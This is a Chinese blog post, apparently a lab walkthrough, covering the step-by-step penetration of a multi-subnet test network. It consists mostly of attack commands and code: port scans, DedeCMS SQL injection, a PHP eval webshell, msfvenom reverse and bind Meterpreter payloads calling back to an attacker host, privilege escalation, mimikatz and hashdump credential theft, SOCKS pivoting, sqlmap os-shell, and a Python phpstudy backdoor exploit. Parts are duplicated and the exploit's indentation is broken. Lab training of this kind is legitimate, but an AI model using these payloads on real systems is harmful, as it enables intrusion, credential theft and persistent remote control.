暗月项目四

项目四-内网渗透

IP 发生改变

10.10.10.134 --> 10.10.10.136

10.10.10.129 --> 10.10.1.129

一、网站漏洞

信息收集

netdiscover -i eth0 -r 192.168.0.0/24  # 扫描内网主机
nmap -sn 192.168.0.0/24 
1
2

端口扫描

masscan -p 1-65535 192.168.0.134 --rate=1000 # 进行端口扫描
nmap -sC -A 192.168.0.134 -p 80,53,49154,6588,3389,135,21,51464,999 # 端口信息扫描
1
2

访问网站各个端口

1. http://192.168.0.134:999/  # phpadmin
2. http://192.168.0.134:6588/ # 主机大师
3. http://192.168.0.134:80    # 网站
1
2
3

本地设置

hosts 绑定
192.168.0.134 www.cc123.com
修改 kaill 网关
vi /etc/resolv.conf  
1

子域名收集

wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H
"Host:FUZZ.cc123.com" --hw 53  # wfuzz 穷举子域名

www.cc123.com
ww2.cc123.com
new.cc123.com
1
2
3
4
5
6

二、漏洞测试

1. new.cc123.com

织梦CMS 系统

经测试发现会员系统开放 http://new.cc123.com/member

查看 CMS 系统的版本
http://new.cc123.com/data/admin/ver.txt   # 20150618
1
查找指定版本的漏洞
1. 存在注入漏洞，寻找指定版本的 exp ，进行执行
2. 经过执行后得到： 密文 812df726be884ddcfc41 解密：admin7
1
2
在会员登陆界面登陆 admin 账户，上传一句话木马

使用蚁剑进行连接提权 --》提权失败

利用蚁剑上传 SSPXspy 文件，并访问密码为 admin

使用 msfvenom 生成可执行文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.143 lport=12345 -f exe > s.exe
1
使用脚本检测目标服务器上可写目录，
# C://Windows/debug/WIA/
# 将s.exe 上传到目标文件夹上
1
2
开启 MSF，开启监听
use exploit/multi/handler 
	set payload windows/meterpreter/reverse_tcp
	set lhost 192.168.0.143
	set lport 12345
	run

# 执行 s.exe 程序
1
2
3
4
5
6
7
监听到会话，开始提权
# 利用反弹的会话
getuid  # 获取权限
background # 退出
use post/multi/recon/local_exploit_suggester  # 利用模块查找目标可利用漏洞
	set session 1 # 设置会话标识
	run 
# 利用查找到的模块： 
use exploit/windows/local/ms16_075_reflection_juicy
	set session 1
	run
getuid  # 查看当下权限
1
2
3
4
5
6
7
8
9
10
11

2. ww2.cc123.com

利用工具 gobuster 扫描
# 目录扫描
gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "aspx,html"  
1
2
扫描得到一个后台： http://ww2.cc123.com/admin 管理后台

利用漏洞：输入账号 admin’ – 即可登陆

利用 sqlmap 测试注入
sqlmap -r cc123 --dbms mssql -v 1 --bat  # 测试注入
sqlmap -r cc123 --dbms mssql -v 1 --dbs  # 列出库
sqlmap -r cc123 --dbms mssql -v 1 --os-shell # 获取 mssql shel1
1
2
3

3. 多重网段内网渗透

前提：获取到了 sql数据库以及 WEB 服务器权限

信息收集

WEB 服务器

IP:
```
192.168.0.134
10.10.10.135
1
2
```

路由

run get_local_subnets  # 查看内网 IP 段
Local subnet: 10.10.10.0/255.255.255.0
Local subnet: 192.168.0.0/255.255.255.0
1
2
3

哈希以及明文密码

migrate 1580 # 迁移进程。目标进程也许为 SYSTEm
run hashdump # 获取 hash

load mimikatz  # 载入 mimikatz
kiwi_cmd -f samdump::hashes  或者  mimikatz_command -f samdump::hashes
kiwi_cmd -f sekurlsa::searchPasswords 或者 mimikatz_command -f sekurlsa::searchPasswords

# 整理
creds_wdigest   wdigest
creds_tspkg   tspkg
1
2
3
4
5
6
7
8
9
10

添加路由多重网段渗透 10.10.10.136

run autoroute -s 10.10.10.0/24  # 添加路由
run autoroute -p   # 查看

background
# 启动 socks 代理 
use auxiliary/server/socks_proxy 
	set srvport 2222
	run

# 使用 proxychains 配置文件
vi  /etc/proxychains4.conf
socks4 127.0.0.1 2222

proxychains nmap -sT -Pn 10.10.10.136  # 使用 proxychains 调用 nmap 扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14

多重网段渗透数据库服务器 10.10.10.134

1. 生成正向连接载荷
	msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
	use exploit/multi/handler
    set payload windows/meterpreter/bind_tcp
    set RHOST 10.10.10.134
    set  lport 13777
    run
1
2
3
4
5
6
7

多重网段内网渗透获取数据库服务器哈希和明文

migrate 1580 # 迁移进程。目标进程也许为 SYSTEm
run hashdump # 获取 hash

load mimikatz  # 载入 mimikatz
kiwi_cmd -f samdump::hashes  或者  mimikatz_command -f samdump::hashes
kiwi_cmd -f sekurlsa::searchPasswords 或者 mimikatz_command -f sekurlsa::searchPasswords

# 整理
creds_wdigest   wdigest
creds_tspkg   tspkg

run get_local_subnets  # 查看内网 IP 段
run autoroute -s 10.10.1.0/24  # 添加路由
run autoroute -p   # 查看
background
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

多重网段内网渗透第三层网络渗透目标WEB服务器

# 启动 socks 代理 
use auxiliary/server/socks_proxy 
	set srvport 8888
	run

# 使用 proxychains 配置文件
vi  /etc/proxychains4.conf
socks4 127.0.0.1 8888

proxychains nmap -sT -Pn 10.10.1.129  # 使用 proxychains 调用 nmap 扫描
1
2
3
4
5
6
7
8
9
10

对于 10.10.1.129 网站进行探索发现 80 端口为 phpstudy

python 编写 phpstudy exp

#conding:utf-8
import requests
import re
import sys
import base64
    shell = "system('"+(sys.argv[1])+"');"
    shell1 = base64.b64encode(shell.encode('utf-8'))
    #shell1 =
    "ZmlsZV9wdXRfY29udGVudHMlMjglMjdtb29uJTI3JTJDJTI3JTNDJTNGcGhwJTIwZXZhbCUy
    OCUyNF9QT1NUJTVCJTIybW9vbiUyMiU1RCUyOSUzQiUzRiUzRSUyNyUyOSUzQg=="
    header={'accept-charset':shell1,'Accept-Encoding':'gzip,deflate'}
    def exploit(url):
        html=requests.get(url=url,headers=header).text
        return html
    print(exploit('http://10.10.1.129/'))
    
# 写入 shell
proxychains3 python3 phpstudy.py "echo ^<?php
    @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

SocksCap代理访问目标WEB服务器

metasploit正向连接目标WEB服务器

msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
	use exploit/multi/handler
    set payload windows/meterpreter/bind_tcp
    set RHOST 10.10.1.129
    set lport 13777
    run 
1
2
3
4
5
6

SocksCap代理访问目标WEB服务器

metasploit正向连接目标WEB服务器

msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
	use exploit/multi/handler
    set payload windows/meterpreter/bind_tcp
    set RHOST 10.10.1.129
    set lport 13777
    run 
1
2
3
4
5
6

相关阅读:
提升绘图效率不再难，看看这8款AI流程图软件，一键快速生成流程图！
监控系统--Zabbix
【面试经典150 | 数组】除自身以外数组的乘积
 synchronized，volatile关键字
 java毕业生设计校园兼职招聘系统计算机源码+系统+mysql+调试部署+lw
校园一卡通系统
 Git | 详解 | 命令
 优思学院｜六西格玛品质管理概念，实现卓越品质的艺术
 vector的动态分配内存实验
 那些年我写过的语言
原文地址：https://blog.csdn.net/weixin_53150482/article/details/126670102